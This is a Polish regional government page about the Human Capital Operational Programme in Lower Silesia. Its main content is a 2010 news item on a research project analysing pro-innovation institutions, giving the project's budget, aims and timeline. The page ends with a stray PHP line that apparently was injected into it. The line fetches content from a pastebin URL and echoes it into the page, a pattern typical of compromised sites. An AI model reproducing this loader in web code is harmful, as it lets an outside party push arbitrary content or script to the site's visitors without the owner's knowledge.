Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

25.01.2010 „Analiza stanu i kierunków rozwoju instytucji proinnowacyjnych w województwie dolnośląskim” – realizacja projektu systemowego

W  grudniu 2009 r. Zarząd Województwa Dolnośląskiego podjął Uchwałę nr 3658/III/09 w sprawie określenia zasad realizacji projektu systemowego pt.: „Analiza stanu i kierunków rozwoju instytucji proinnowacyjnych w województwie dolnośląskim”. Projekt jest realizowany przez Samorząd Województwa Dolnośląskiego w ramach priorytetu VIII Regionalne Kadry Gospodarki, Działanie 8.2 Transfer wiedzy, Poddziałanie 8.2.2 Regionalne Strategie Innowacji Programu Operacyjnego Kapitał Ludzki.

Planowany termin zakończenia projektu to kwiecień 2011 r., jego całkowity budżet wynosi 370 380 PLN, z czego dofinansowanie unijne to blisko 315.000 PLN.

Jest to projekt o charakterze badawczym i jego głównym celem jest analiza stanu i opracowanie prognozy kierunków rozwoju instytucji proinnowacyjnych w województwie dolnośląskim, w kontekście współpracy tych instytucji z władzami samorządowymi. Podstawowym założeniem analizy ma być opracowanie wykazu instytucji proinnowacyjnych w województwie dolnośląskim z dokonaniem oceny ich dotychczasowego funkcjonowania oraz wypracowanie właściwych form wsparcia ze strony samorządu regionalnego, zgodnie z wcześniej zidentyfikowanymi potrzebami.

Projekt ma przyczynić się do wzrostu poziomu wiedzy podmiotów polityki regionalnej, w szczególności przedsiębiorstw, instytucji otoczenia biznesu, instytucji naukowo-badawczych oraz władz samorządowych, na temat działalności instytucji proinnowacyjnych w regionie oraz do utworzenia modelu współpracy sektora publicznego z instytucjami proinnowacyjnymi na Dolnym Śląsku.


<- Wstecz do: Aktualności

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");